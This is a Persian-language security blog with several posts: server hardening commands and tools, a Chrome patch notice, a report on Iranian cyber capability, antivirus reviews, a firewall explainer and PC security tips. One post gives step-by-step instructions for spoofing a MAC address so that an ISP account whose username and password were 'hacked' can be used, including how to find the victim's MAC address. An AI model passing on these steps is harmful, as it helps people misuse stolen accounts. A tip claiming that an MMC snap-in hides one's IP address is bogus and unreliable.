البته می توانید حداقل ۹۰ درصد این کار ها را با نوشتن script های دلخواه انجام دهید و شما فقط لوگ های مربوطه را چک کنید و فقط در مواقع ضروری روی سرور لوگین کنید . در این جا برخی از command های پر استفاده رو در این ضمینه ارائه می کنم:

netstat -anp : لیست کلیه connection های باز سرور را به شما می دهد تا به دنبال پورت ها یا نرم افزار های مشکوکی که روی سرور run هستند ولی شما اجاره اجرا شدن به انها نداده اید مشاهده کنید و در صورت لزوم بوسیله firewall دسترسی انها را مسدود کنید.

find / ( -perm -a+w ) ! -type l >> world_writable.txt : این دستور لیست کلیه فایل هایی را که permission 777 دارند و توسط کلیه کاربران روی سرور قابلیت ویرایش دارند را به شما نشان میدهد (داخل فایل txtذخیره می کند) اکثر مشکلات امینی داخل همین فولدر ها اتفاق می افتد.

ls /var/log/ : اکثر لوگ فایل ها داخل پوشه var هستند شما در صورت نیاز به لوگی از از هر سرویس خاصیمی توانید در این فولدر به آن مراجعه کنید (البته لوگ های apache در فولدر /usr/local/apache/logs هست)

در کنار تمامی موارد script های زیادی هستندکه به شما در این کار ها کمک می کنند . البته چیزی که بر حسب نیاز خودتون برای خودتون بنویسید مسلما یک چیز دیگس. یک سری برنامه ها اسمشون رو می نویسم که به درد می خورند .

* Tripwire – این نرم افزاری هست که md5 کلیه فایل های مربوط به سیستم را چک می کنه و در صورتی که این فایل ها تغییر کند به شما هشدار می دهد.
http://tripwire.com or http://sourceforge.net/projects/tripwire
* Chrookit – نرم افزاری برای پیدا کردن trojan – backdoor و غیره بر روی سرور.

http://www.chkrootkit.org

* Rkhunter – نرم افزاری برای پیدا کردن trojan – backdoor و غیره بر روی سرور.

http://www.rootkit.nl/projects/rootkit_hunter.html

* Logwatch – نرم افزاری برای بررسی لوگ ها و فعالیت های سرور به صورت روزانه و تهیه گزارش کامل برای شما

http://logwatch.org

9- حتما یک firewall نرم افزاری داشته باشید !!

اگر firewall سخت افزاری هم دارید باید یک فایروال جداگانه روی سرور داشته باشید .

با استفاده از firewall می تونید لیست پورت هایی که استفاده نمی شوند رو محدود کنید و با این کار حجم زیادی از نرم افزار های backdoor و … را از کار بیاندازید . همچنین با استفاده از firewall می توانید ادرس های ip خاصی را block کنید و حتی در مقابل حملات ddos اسیب ناپذیر باشید.
در زیر لیست پورت های مورد نیاز cpanel امده است( اگر سرویس دیگری ندارید می توانید بقیه پورت ها را به غیر از این ها ببندید . چون نیازی به انها ندارید ) : http://faq.cpanel.net/show.cgi?qa=10468918040763
بهترین firewall از نظر من روی cpanel هم نصب میشه و خوب جواب میده همون APF هست که با rule های خود لینوکس iptables کار می کنه.
اگر شما هم با این نرم افزار کار می کنید اینجا رو مطالعه کنید : http://faq.cpanel.net/show.cgi?qa=108499296901804

10 - همیشه بروز باشید
۸۰ در صد مشکلات امینتی در روز های اول عمرشون براشون patch و update امنیتی میاد یعنی یک bug هرچقدر هم که underground باشد بالاخره براش patch نوشته می شود پس سعی کنید که همیشه از آخرین نسخه های نرم افزار استفاده کنید . نسخه ی کرنل حداقل هر ۲ ماه یک بار باید بروز بشه بقیه نرم افزار ها باید هر هفته چک بشن و در صورت لزوم update بشوند. خود cpanel باید هر روز updateشود به دلیل اینکه هر روز شرکت سی پنل به روز می شود

 

مرتضی(Germany) بازدید : 132 شنبه 16 اردیبهشت 1391 نظرات (0)

آموزش تغییر Mac سیستم به راحتی بدون نرم افزار



واسه تعویض Mac سیستم خودتان نیاز به نرم افزار خاصی نیست بصورت دستی می توانید به راحتی تغییرش بدهید .

ابتدا روی Local Area Connection کلیک راست کنید و Propertise را انتخاب کنید :

صفحه که باز شد روی Configure کلیک کنید

و در صفحه بعدی به تب دوم بروید یعنی روی Advanced کلیک کنید حالا از منوی کشویی Property گزینه Network Address انتخاب کنید و بعد تیک Vaule رو بگذارید و در کادر آدرس Mac جدید را تایپ کنید

Mac را بدون علامت دو نقطه ":" ، مثلاً "001A15D371C5" تایپ کنید و در آخر کار هم ok کنید و تمومه به همین سادگی و به همین خوشمزگی .


MAC اصلی سیستم ما و سیستم User هک شده


MaC سیستم خودمان را که با راست کلیک روی Local Area Connection و انتخاب Status و سپس Details متوانیم ببینیم :

معمولاً در سطر سوم جلوی Physical Address هستش .


خب حالا اگر User و Pass از یک ISP دارید (هک کردید یا ...) و آنها هم از MAC F-i-l-t-e-r ing استفاده می کنند ،

شما نمی توانید به اینترنت وصل شوید چرا که باید با همان Mac باشید تا Error 691 اعصابتان را به هم نریزد ، از کجا ؟! .. :


واسه پیدا کردن MAC اصلی صاحب User از طریق لینک IBSNG آن ISP که توی سایت اصلی معمولاً هست به کنترل پنل User وارد شوید

بعد روی گزارش اتصالات کلیک کنید و در آن صفحه همانطور که توی عکس ضمیمه می بینید روی Details کلیک کنید ، آدرس مک نمایان می شود .

آنرا کپی و طبق آموزش بالا سیستم خود را با آن مک بالا بیاورید .


تصاویر پیوست شده                                             download


download


download

مرتضی(Germany) بازدید : 91 شنبه 16 اردیبهشت 1391 نظرات (0)

 

گوگل یك نسخه جدید از كروم 18 را منتشر كرده است. در این نسخه سه رخنه با درجه امنیتی "بسیارمهم" و دو رخنه با درجه امنیتی "متوسط" را برطرف شده است.



گوگل یك نسخه جدید از كروم 18 را منتشر كرده است. در این نسخه سه رخنه با درجه امنیتی "بسیارمهم" و دو رخنه با درجه امنیتی "متوسط" را برطرف شده است.

شما می توانید با استفاده از به روز رسان بی سرو صدای تعبیه شده در نرم افزار، مرورگر كروم خود را به آخرین نسخه به روز رسانی نمایید یا می توانید آخرین نسخه مرورگر كروم را به


طور مستقیم از google.com/chromeدانلود نمایید.


پنج آسیب پذیری امنیتی اصلاح شده در گوگل كروم نسخه 18.0.1025.168 به شرح زیر است:


آسیب پذیری CVE-2011-3078: یك خطای استفاده پس از آزادسازی در مدیریت اعداد اعشاری.


آسیب پذیری CVE-2012-1521: یك خطای استفاده پس از آزدسازی در تجزیه گر xml.


آسیب پذیری CVE-2011-3079: یك مشكل در اعتبارسنجی IPC.


آسیب پذیری CVE-2011-3080: یك مشكل در شرایط رقابتی در sandbox IPC.


آسیب پذیری CVE-2011-3081: یك خطای استفاده پس از آزادسازی در مدیریت اعداد اعشاری.

منبع:
certcc

مرتضی(Germany) بازدید : 99 شنبه 16 اردیبهشت 1391 نظرات (0)

 

گزارشی در مورد قدرت سایبری ایران

نگرانی بزرگ ایالات متحده آن است که یک حمله سایبری می تواند سیستم شبکه برق رسانی کشور را دچار اختلال کرده و آن را از کار بیاندازد. متخصصین امنیت سایبری می گویند در حال حاضر ایران این توانایی را نداشته ولی می تواند به سیستم بانکی این کشور حمله کرده و اطلاعات مالی درون سیستم را تغییر دهد. در آن صورت، ما شاهد هرج و مرج طولانی مدت در آمریکا خواهیم بود.

iran cyber army

به گزارش بخش خبر پرتال از گرداب به نقل از ایران دیپلماتیک، "تام یلتن"، گزارشگر "ان پی آر" طی گزارشی می نویسد: متخصصین امنیتی سازمان های دولتی و خصوصی مدت مدیدی است که نگران شروع جنگ سایبری با چین و روسیه هستند. این دو کشور قادر به راه اندازی حملات مخرب علیه آن دسته از شبکه های کامپیوتری هستند که سرمایه های حیاتی مانند سیستم های برق رسانی و مالی را کنترل می کنند.


این گزارش اضافه می کند: هم اکنون آنها با تهدید دیگری روبرو شده اند و آن ایران است. Jeffrey Carr، متخصص جنگ سایبری و مشاور وزارت دفاع آمریکا ادعا کرد که ایران منابع و توانایی لازم به عنوان یک رقیب قدرتمند برای درگیری در یک جنگ سایبری را دارد.


وی می افزاید: تخصص ایران در حد توانایی های چین و روسیه نیست، ولیکن برخلاف این دو کشور، ایران در حال حاضر با آمریکا بر سر مسائل هسته ای خود درگیری داشته و احتمال بروز تنش و خصومت بین دو کشور بیشتر است.


تحریم های آمریکا علیه ایران به قدری شدید است که در واقع می توان از آن به عنوان یک جنگ اقتصادی نام برد. به همراه این تحریم ها، تهدیدهای رژیم صهیونیستی در مورد اقدام نظامی علیه تاسیسات هسته ای ایران، می تواند ایرانیان را وسوسه کند تا حمله سایبری علیه آمریکا را در نظر بگیرند.


این گزارش ادامه می دهد: نگرانی ها در این مورد زیاد است. "جیمز کلپر"، رئیس سازمان اطلاعات ملی در اوایل سال جاری طی گزارشی به کنگره مدعی شد که ایران در حال حاضر بیش از هر زمان دیگر خواهان حمله به آمریکا بوده و توانایی سایبری آنها به طرز چشمگیری در سال های اخیر افزایش یافته است.


به عنوان مثال، ایرانیان توانایی قابل توجهی از خود در نظارت بر ارتباطات آنلاین مخالفین نشان داده اند. آنها ارتش سایبری ایران را سازماندهی کرده و توانسته اند سایت توئیتر را از کار انداخته، سایت های دیگر را بلوکه کرده و حملات سایبری پیچیده در داخل ایران انجام دهند.


نگرانی بزرگ ایالات متحده آن است که یک حمله سایبری می تواند سیستم شبکه برق رسانی کشور را دچار اختلال کرده و آن را از کار بیاندازد. متخصصین امنیت سایبری می گویند در حال حاضر ایران این توانایی را نداشته ولی می تواند به سیستم بانکی این کشور حمله کرده و اطلاعات مالی درون سیستم را تغییر دهد. در آن صورت، ما شاهد هرج و مرج طولانی مدت در آمریکا خواهیم بود.


ان پی آر همچنین می نویسد: ژنرال "James Cartwright"، قائم مقام اسبق رئیس ستاد ارتش می گوید: «ایران ممکن است توانایی سایبری خود را به منزله نیروی بازدارنده در قبال تهدیدات خارجی توسعه دهد. اما داشتن این توانایی لزوما برای مقاصد بازدارنده کابرد نداشته و ایران می تواند این اطلاعات را به راحتی در اختیار گروه هایی که تردید کمتری در استفاده از آن دارند، قرار دهد.


"John Brennan"، مشاور مبارزه با تروریسم کاخ سفید اظهار می کند: «برخی از کشورها در حال توسعه تهاجمی توانایی های اینترنتی خود بوده و کشورهایی نیز در تنش با آمریکا می هستند و ما از آن آگاه هستیم. ما با تمام توان خود از حمله کشورهایی که توانایی سایبری و اراده استفاده از آن را دارند، جلوگیری خواهیم کرد.

 

مرتضی(Germany) بازدید : 567 شنبه 16 اردیبهشت 1391 نظرات (0)

با سلام به تازگی تب هک سیستم های شخصی در اینترنت بسیار زیاد شده است

و بسیاری از هکر ها به دنبال هدف های مناسب میگردند من هم وقت رو مناسب دونستم تا این ویدیو رو برای شما کاربران عزیز آماده کنم


در این فیلم با نحوه بستن پورت های باز سیستم آشنا خواهید شد


توضیحات بیشتر را در فیلم خواهید دی

   لطفا برای دانلود به ادامه ی مطلب بروید                                           

مرتضی(Germany) بازدید : 578 شنبه 16 اردیبهشت 1391 نظرات (0)

 

پورت اسکنر پیشرفته چیست

 

پیشرفته اسکنر پورت کوچک، سریع، قوی و آسان برای استفاده از پورت اسکنر برای پلت فرم Win32 است. با استفاده از یک تکنیک


multithread، بنابراین بر ​​روی ماشین های سریع شما می توانید پورت های بسیار سریع اسکن. همچنین شامل شرح پورت های مشترک،


و می تواند اسکن در محدوده بندر از پیش تعریف شده انجام دهد.


         

  لطفا برای دانلود به ادامه ی مطلب بروید                                                                       

مرتضی(Germany) بازدید : 117 شنبه 16 اردیبهشت 1391 نظرات (0)

اینم یه نرم افزار برای بررسی فایل های آلوده و مشکوک همزمان با 43 آنتی ویروس


این نرم افزار با اتصال به سایت ویروس توتال به شما این امکان را می دهد


که فایل آلوده و یا ناشناس و مشکوک را همزمان با 43 آنتی ویروس و نوع آن و اینکه


توسط چه آنتی ویروس های شناسایی شده را نمایش دهد .  



                                                                         dawnload

مرتضی(Germany) بازدید : 89 شنبه 16 اردیبهشت 1391 نظرات (0)

در سال ۱۹۷۰ بصورت عمومی تکنولژی و فن آوری ای اختراع شد که همه ی جهان را دگرگون ساخت و بعد ها به عنوان شبکه ی جهان وب شناخته شد . از آن زمان تا کنون اینترنت بوجود آمد اما با گذشت زمان و وابسته شدن بسیاری از افراد به اینترنت تمام تهدیدات محیطی نیز افزایش یافت و این تهدیدات محیط آنلاین به نگرانی بسیاری برای دولت ها تبدیل شد .
علاوه بر محیط آنلاین ، بخاطر گسترش اطلاعات فردی و سازمانی بر روی کامپیوتر ها و تمایل هکر ها برای بدست آوردن آن ها ، مبحث امنیت به یک مساله ی جدی برای هر کسی تبدیل شده است. اما محافظان ما در این جهان تنها آنتی ویروس ها هستند که هزاران گونه از آن در دنیای وب وجود دارد . اما روز به روز به گستردگی جواب اینکه “کدام آنتی ویروس برای من بهتر است ؟” بعضی از ما را دچار مشکل کرده است . من در این پست قصد دارم با توجه به اطلاعات آماری ، بررسی های متعدد و تجربه شخصی در مورد این نرم افزار ها به این سوال پاسخ بدهم . البته قبل از اینکه ما بررسی را شروع کنیم توجه داشته باشید.که آنتی ویروس ها بر اساس آخرین بروزرسانی ها و آپدیت ها بررسی شده اند پس شماهم همیشه این کار را در نظر بگیرید . بهترین آنتی ویروس ها (البته در حالت پرمیوم)


1- آنتی ویروس بیت دفندر این آنتی ویروس کار خود را به عنوان یک آنتی ویروس غیرموثر آغاز کرد . اما با گذشت زمان تبدیل به یکی از بهترین نرم افزار های آنتی وروس شد . رابط کاربری ساده و کاربرپسند بودن آن سر و صدای زیادی بین کاربران کرده است. به نظر من همه ویژگی های یک آنتی ویروس خوب در این نرم افزار وجود دارد مانند :امنیت بالا ، سهولت استفاده و البته استفاده ی شرکت ناسا از این آنتی ویروس به عنوان سیستم امنیتی خود. این آنتی ویروس بطور دایم کامپیوتر شما را با کمترین استفاده رم اسکن کرده و اگر موردی دیده شد به شما خبر میدهد. همچنین این برنامه بلافاصله پس از یافتن ویروس ها آن ها را بطور موقت غیر فعال میکند و با اجازه ی شما نیز میتواند آن را پاک کند . به نظر من این آنتی ویروس عالی ترین آنتی ویروس موجود در جهان است.



2- آنتی ویروس نورتن در دنیای وب همه چیز در مورد این آنتی ویروس شنیده میشود ، این آنتی ویروس یک امنیت پر قدرت در مقابل عوال خارجی و وب است که هرکسی میتواند از آن لذت ببرد . تنها مشکل نورتن نیاز آن به یک سیستم قدرت مند است تا بتوانند درست کار کند . ولی اگر شما آن را نصب کنید از تقریبا همه ی ویروس ها و نرم افزار مخرب بخاطر گستردگی پایگاه داده این نرم افزار میتوانید سود ببرید ، همچنین این نرم افزار تمام ایمیل ها و دانلود های شما را اسکن میکند.



3- آنتی ویروس نود ۳۲ ;نود ۳۲ یکی از آنتی ویروس هایی که چند سالی به شدت گرفتار و زمین گیر است . نسخه جدید آنتی ویروس Eset nod 32 یکی از جالب ترین آنتی ویروس های تست شده و کارکننده از نظر ایرانی هاست . این آنتی ویروس برای استفاده از نسخه پرمیوم خود پول زیادی دریافت نمیکند و نسخه پرمیوم با نسخه رایگان هیچ فرقی ندارد ، عالی کار میکند ، کمترین حافظه رم را اشغال میکند و یک رابط کاربری فوق العاده دارد . اگر شما بدنبال آنتی ویروسی هستید که بی سر و صدا در پس زمینه کامپیوتر برای شما کار کند نود ۳۲ بهترین گزینه است .



4- آنتی ویروس کسپراسکی ;کسپراسکی یکی از قدیمی ترین آنتی ویروس هایی است که از قدیم تا کنون توانسته است قدرت مانور خود را نگه دارد . یکی از بهترین و قدیمی ترین ویژگی های این آنتی ویروس ، اسکن سریع صفحات وب و دانلود های شماست . این یک نرم افزار خوب برای لپ تاب های شما که بیشتر در امر کسب و کار فعالیت میکنید می باشد و همچنین بیشتر کارشناسان این آنتی ویروس را برای امنیت اینترنت و وب توصیه میکنند .



5- آنتی ویروس ZoneAlarm; من باید به این اعتراف کنم که آنتی ویروس مورد علاقه ی من این آنتی ویروس میباشد . من برای یک دوره ی بسیار طولانی از این آنتی ویروس استفاده کردم و هیچ چیز بدی که در مورد آن میگویند را در آن ندیدم . یکی از بهترین ویژگی ها این آنتی ویروس رایگان، فایروال قدرتمند آن است . اما این آنتی ویروس نیز همانند آنتی ویروس نورتون تشنه به حافظه ی رم کامپیوتر است و برای استفاده عالی از همه ی امکانات آن باید به یک کامپیوتر قوی مجهز باشید .



6-آنتی ویروس مکافی ۲۰۱۲ پلاس; اگر شما یه روش امنیتی قدیمی علاقه مند هستید میتوانید از این آنتی ویروس استفاده کنید . این آنتی ویروس یکی از قدیمی ترین آنتی ویروس های موجود در بازار است . حتما همه ی شما در مورد این آنتی ویروس شنیده اید . البته کارکنان شرکت مکافی امسال آنتی ویروس خوبی را به بازار عرضه کرده اند و بهترین ویژگی این آنتی ویور ارائه ی حفاظت بسیار خوب است .



7- آنتی ویروس پاندا; با وجود اینکه این آنتی ویروس یکی از شکست خوردگان در قدیم است اما امسال یکی از بهترین آنتی ویروس ها خود را ارائه کرده است . این آنتی ویروس یکی از بزرگترین آنتی ویروس های قدیم بود و از بهترین ویژگی ها آن میتوان به تعادل رابطه ی تعاملی کاربری ، امنیت آن و پایگاه های داده ی آن اشاره کرد . البته فکر نمیکنم تعداد بسیاری از این آنتی ویروس استفاده کنند اما باید توجه کرد که این آنتی ویروس یک آنتی ویروس بسیار عالی برای آنانی است که از کامپیوتر های بسیار قدیمی و کم قدرت استفاده میکنند.



8-آنتی ویروس AVG; به جرأت میتوانم بگویم که این آنتی ویروس در صدر آنتی ویروس های رایگان است همچنین این آنتی ویروس شما را از بسیاری از ویروس ها و برنامه ی مخرب مصون میدارد . فن آوری استفاده شده در آن موسوم به فن آوری سپر شماره مانع از باز کردن فایل های آلوده مینماید . پس از تست کردن این آنتی ویروس به نظر می آید با توجه به قدیمی بودن آن هنوز هم حرف های بسیاری برای گفتن دارد !



9-آنتی ویروس AVAST; نسخه ی رایگان این آنتی ویروس یکی از بهترین آنتی ویروس های رایگان است . نسخه ی رایگان آن میتواند با دیگر آنتی ویروس ها از نظر امنیت و دیتابیس مقابله کند . اما عمده مشکل آن قیمت های بروزرسانی آن است . ولی من پس مقایسه ی ویژگی ها نسخه رایگان با نسخه پولی واقعا تحت تاثیر قرار گرفتم .





10 – آنتی ویروس CA; در اصل نام این آنتی ویروس همکار رایانه (Computer Associates Antivirus 2012) که بصورت خلاصه به CA معروف است . اما ویژگی های این همکار رایانه آن را برابر با بسیاری از آنتی ویروس ها می سازد . این همکار رایانه کامپیوتر شما را از هرگونه فایل های اضافی، ویروس ها پاک می سازد . پس این برنامه برای در کنار بودم یک آنتی ویروس لازم است.

 

مرتضی(Germany) بازدید : 126 شنبه 16 اردیبهشت 1391 نظرات (0)

یک فایروال چه می کند؟ یک فایروال در حقیقت حصاری است که نیروهای خرابکار را از شما دور نگه می دارد. به همین دلیل به آن فایروال (دیوار آتش) گفته می شود. کار این حصار شبیه یک دیوار آتش فیزیکی است که از گسترش آتش از یک ناحیه به ناحیه دیگر جلوگیری می کند.

در این گزارش که از مقاله ی منتشر شده توسط مرکز مدیریت امداد و هماهنگی عملیات رخدادهای رایانه یی(ماهر) برگرفته شده، اطلاعات بیش تری راجع به فایروال ها، نحوه کار آن ها و خطراتی که در مقابل آن از شما محافظت می کنند، به دست خواهید آورد.



● یک فایروال چه می کند؟

یک فایروال یک برنامه یا یک وسیله سخت افزاری است که اطلاعاتی را که از طریق اینترنت به شبکه یا کامپیوتر شما وارد و یا از آن خارج می شود، بررسی و درصورت نیاز فیلتر می کند. اگر بسته ای که در حال ورود به شبکه شماست بعنوان بسته فیلتری برچسب بخورد، دیگر اجازه ورود به شبکه شما را نخواهد داشت.

فایروال می تواند قوانین امنیتی را پیاده کند. برای مثال یکی از قوانین امنیتی یک شرکت می تواند این باشد: از میان ۵۰۰ کامپیوتر این شرکت، فقط یکی حق دارد ترافیک FTP را دریافت کند. یک شرکت می تواند چنین قوانینی را برای سرورهای FTP، سرورهای وب، سرورهای Telnet و مانند آن اختصاص داده و تعریف کند.

به علاوه یک شرکت می تواند در مورد نحوه اتصال کارمندان به وب سایت ها و اینکه آیا فایل ها مجوز خروج از شبکه شرکت را دارند یا خیر، کنترل های لازم را اعمال کند. یک فایروال کنترل مناسبی برروی نحوه استفاده کارمندان از شبکه ایجاد می کند.

فایروال ها با استفاده از چند روش ترافیک ورودی و خروجی شبکه را کنترل می کنند.


تفتیش Stateful

روشی جدید که محتویات هر بسته را بررسی نمی کند و به جای آن، بخش های کلیدی مشخصی از بسته ها را با یک پایگاه داده مطمئن مقایسه می کند. اطلاعاتی که از درون فایروال به بیرون می روند، از لحاظ برخی ویژگی ها بررسی و کنترل شده و اطلاعات ورودی با این ویژگی ها مقایسه می گردند. اگر تطابق معنا داری بین این دو دسته وجود داشته باشد، آنگاه اطلاعات اجازه ورود را خواهند داشت و در غیر این صورت رد می شوند.

 

مرتضی(Germany) بازدید : 830 شنبه 16 اردیبهشت 1391 نظرات (0)

 

بستن پورت 445 که 100% جواب میده

 

سلام
این اولین پسته منه
در انجمن انواع راه حل های بستن پورت خطرناک 445 را اموزش داده ولی من هرکدوم را اجرا کردم جواب نداد
این روش را توی نت پیداکردم امیدوارم بدردتون بخوره
من این روش را توی xp اجراکردم جواب داد
توی run بزنید regedit
بعد این مسیر را برید
HKEY_LOCAL_MACHINESystemCurrentControlSetServic esNetBTParameters

بعد سمت راست این کلید TransportBindName را انتخاب روش دوبار کلیک کنید

یک پنجره باز میشه مقادیر value data را پاک کنید و ok را بزنید
حالا سیستم را رستات کنید
حالا این دستور netstat -an را توی داس یا همون cmd بزنید میبینید خبری از پورت445 نیست



______بابک بوتر______ بازدید : 99 شنبه 16 اردیبهشت 1391 نظرات (0)

 

شیوه‌ای جدید و جالب برای ساخت پسوردهای مقاوم

 

گروهی از کارشناسان و پژوهشگران آلمانی شیوه جدیدی برای ایجاد کلمات عبور ابداع و معرفی کرده‌اند که در نوع خود جالب توجه است.

این شیوه که p-CAPTCHA نام دارد، توسط پژوهشگران موسسه آلمانی Max Planck Institute for the Physics of Complex systems و شرکت تحقیقاتی Axioma Research معرفی شده است.

حرف p در ابتدای واژه CAPTCHA، به لغت کلمه عبور (password) اشاره می‌کند.

این شیوه که به نظر می‌رسد از ضریب اطمینان بسیار بالایی برخوردار است، با بخش‌بندی کردن حروف کلمه عبور به دو قسمت «آسان» و «سخت» کار می‌کند.

کاربر باید بخش آسان را به خاطر بسپارد.

استفاده از بخش سخت کلمه عبور هم به یک اپلت جاوا واگذار می‌شود.

اپلت جاوا یک کپچا برای قسمت دشوار کلمه عبور ایجاد می‌کند.

به عبارت دیگر بخش ثانویه کلمه عبور، به یک تصویر کپچا تبدیل می‌گردد.

در ادامه p-CAPTCHA به صورت رمز درآمده و قسمت آسان کلمه عبور را به کار می‌گیرد.

خلاصه مراحل به این ترتیب است که کاربر برای وارد کردن کلمه عبور خود، کافی است بخش اولیه و آسان رمز عبور را وارد نماید.

سپس با ظاهر شدن p-CAPTCHA، باید تصاویر به نمایش درآمده را در کادر مربوطه درج کرده و به این ترتیب با شیوه‌ای غیرقابل دسترس، کلمه عبور نوشته می‌شود و کاربر می‌تواند به فایل یا بخش محافظت‌شده دست یابد.

این کلمات عبور به خوبی در برابر حملات موسوم به brute-force مقاوم است.

یادآور می‌شود کپچا همان خطوط کج و معوجی است که معمولاً به هنگام نظر دادن در یک سایت یا مشارکت در یک تالار گفتگوی اینترنتی نمایان می‌شود و کاربر باید برای ورود به مرحله بعد، آن خطوط و نوشته‌ها را دقیقاً در کادر مربوطه تایپ کند.

کپچا راهکاری برای مقابله با عملکرد نرم‌افزارهای مخرب است چرا که فقط یک انسان می‌تواند این نوشته‌ها و در واقع معماها را حل کند، نه یک رایانه.

براساس گزارش سایت خبری فن‌آوری اطلاعات نوشته است: در این شیوه رمزنگاری، از الگوریتم AES نیز استفاده می‌شود و همین امر ضریب اطمینان آن را افزایش می‌دهد.

گفته می‌شود تا کنون هیچ حمله‌ای علیه الگوریتم AES صورت نگرفته‌ و هیچ ضعف تئوریکی در این الگوریتم شناخته نشده است

 

 

______بابک بوتر______ بازدید : 106 شنبه 16 اردیبهشت 1391 نظرات (0)

 

:: مخفی کردن IP در برابر هکرها

در صورتی که تنها سررشته ای از هک و امنیت را داشته باشید میدانید که بسیاری از هکرها برای نفوذ به سیستم قربانی از IP او استفاده میکنند. با استفاده از این ترفند میتوانید کاری کنید که IP شما برای همیشه دور از دسترس این افراد باشد و به نوعی به طور کامل IP خودتان را از دسترس دیگران مخفی نگه دارید.

برای این کار:

 1- ابتدا از منوی Start به Run رفته و در محیط Run عبارت MMC را تایپ نمایید.

 2- در محیط جدید، از منوی File به قسمت Add/Remove Snap-in بروید.

 3- در پنجره باز شده بر روی دکمه Add کلیک کنید.

 4- در پنجره جدید، بر روی IP Security Policy Management کلیک کرده و دکمه Add را بزنید.

 5- سپس Finish را زده و خارج شوید.

 6- در پنجره قبلی بر روی Ok کلیک کنید.

 7- حال در همان محیط اولیه هستید. در حال حاضر آیکون کناری عبارت IP Security PolicyManagement زرد رنگ است. اکنون میبایست یکبار بر روی آن کلیک کنید تا رنگ آن به سبز تغییر پیدا کند.

 8- در پایان از منوی File به Exit رفته و با انتخاب Yes این عملیات را ذخیره کنید.

 

 

______بابک بوتر______ بازدید : 80 شنبه 16 اردیبهشت 1391 نظرات (0)

 

راه چاره چیست ؟

با دانستن این نکته که هک چیست و هکر چه هدفی دارد، این سوال مطرح می شود که در مقابل هک و نفوذ هکرها چگونه باید مقابله کرد که در پاسخ باید گفت بهترین راه مقابله با هکرها بالا بردن امنیت سیستم های کامپیوتری است. این کار ممکن است با تهیه سیستم های نرم افزاری و سخت افزاری انجام شود. هیچ گاه به یک روش خاص جهت حفظ امنیت اکتفا نکنید و نسخه جدید هر نرم افزار را تهیه و دسترسی کاربران به اطلاعات را کنترل کنید.


 


:: 13 ترفند فوق العاده برای افزایش امنیت سیستم در برابر هک



 1: استفاده از یک نرم افزار ضد هک با آخرین به روز رسانی ها که من Black Ice را پیشنهاد می کنم چون نیازهای کاربران حرفه ای و تازه کار را به طور کامل برطرف می کند. البته Zone Alarm که از ورژن 5 به بعد به ضد ویروس هم مجهز شده نیز انتخاب خوبیست ولی باید بدانید این نرم افزار نیاز به آموزش دارد (باید کتاب آموزشی آن که به تازگی منتشر شده را خریداری کنید) و بیشتر برای کاربران حرفه ای طراحی شده و کاربران تازه کار نمی توانند از آن به درستی استفاده کنند.

 2: استفاده از ویروس کشهای KasperSky یا NOD32 که اگر Pack کامل باشد خیلی بهتر است {پک کامل شاملAnti Virus ،Anti Spyware / Adware،Firewall ،Anti spam ،Security Center،Privacy Service می باشد} توجه داشته باشید که نرم افزارهای فوق را از سایتهای اصلی آنها بگیرید و اقدام به خرید آنها نکنید، چون اکثر شرکتهایی که سی دی های آنتی ویروس را جمع آوری می کنند اصلا به این نکته توجه نمی کنند که این برنامه ها باید از سایت اصلی باشند و در بسیاری از موارد نسخه های کرک شده و گاها ویروسی را از سایتهای غیر قانونی یا به اصطلاح Warez می گیرند و این خود باعث می شود که برنامه قابلیت های خود را از دست بدهد. من پیشنهاد می کنم نسخه های نمایشی یا زمان دار این برنامه ها را دانلود کنید و سپس با دادن سریال نامبر آنها را رجیستر کنید. بعنوان مثال پک کامل مربوط به شرکت Symantec به نام Norton Internet Security و پک کامل KasperSky با نام Internet Security عرضه می شود.

 3: سطح ایمنی و ویروس کشی را در حالت High بگذارید تا تمام فایلها، با هر پسوندی که هستند ویروس کشی شوند و توجه داشته باشید بعضی از ویروس کش ها حالتی را با عنوان Heuristic دارد، که به معنی اکتشافی است و در این حالت ویروس کش، به طرز هوشمندانه ای اقدام به ویرس یابی می کند. توجه داشته باشید خیلی از ویروس هایی که در کامپیوتر شما پنهان شده اند به این روش آشکار می شوند. در حقیقت این نوع ویروس ها دو زیست هستند و مرتبا تغییر می کنند و از این رو ویروس کش، در حالت عادی نمی تواند آنها را بیابد.

 4: Service Packهای ویندوز را دانلود کنید و همیشه ویندوز خود را به روز نگه دارید. البته با سرعت پایین اینترنت در ایران این کار عملا غیر ممکن است و به همین خاطر شما می توانید Service Pack 3 ویندوز را از طریق سی دی خریداری کنید.

 5: تنظیمات صحیح خود سیستم عامل و عدم به اشتراک گذاری فایلها. این تنظیمات عبارتند از غیر فعال کردن NetBios و سرویس Remote Assistance و بستن مسیر ورودی کرم MsBlaster که حفره آن همیشه ممکن است خطر ساز باشد.

 6: عدم استفاده از برنامه های به اشتراک گذاری فایل از جمله Kazza که به علت نقص های بیشمار و همراه داشتن برنامه های جاسوسی استفاده از آن دیوانگی است.

 7: عدم استفاده از Internet Explorer. خیلی از برنامه های جاسوسی و Trojanها فقط در صورتی دانلود و در نتیجه فعال می شوند که صفحه مربوطه توسط Internet Explorer باز شود، همچنین خیلی از کرمهای اینترنتی در صورت اجرا شدن و باز بودن اینترنت اکسپلورر گسترش پیدا می کنند. پیشنهاد می کنم از یک مرورگر دیگر به جای Internet Explorer استفاده کنید و قابلیت های PlugIn و Java Script آن را نیز غیر فعال کنید. در این میان مرورگر Firefox یا Opera از همه کارآمدتر می باشند.

 8: افزایش امنیت Internet Explorer در صورت اصرار بر استفاده ار این نوع بروزر. با همه این احوال شاید موقعیتی پیش آید که باید از مرورگر استاندارد اینترنت یعنی Internet Explorer استفاده کنید به همین خاطر روش های افزایش امنیت Internet Explorer را نیز بیان می کنم.
Cookie ها را بعد از قطع شدن از اینترنت پاک کنید، البته اگر مدت طولانی به اینترنت وصل بوده اید و در وبلاگ یا ایمیل خود وارد شده اید نیز حتما این کار را در حین کار با اینترنت نیز انجام دهید. در صورتی که به محتویات Temporary Internet Files نیاز ندارید آنها را هم پاک کنید، برای انجام این کارها مراحل زیر را دنبال کنید:

Internet Explorer > Internet Option > Delete Cookie
Internet explorer > Internet Option > Delete Files

8.1: جلوی کوکی هایی که می توانند خطرناک باشند را بگیریم. برای این کار مراحل زیر را طی کنید و حالت Medium High را انتخاب کنید:

Internet Explorer > Internet Option > {tab} Privacy

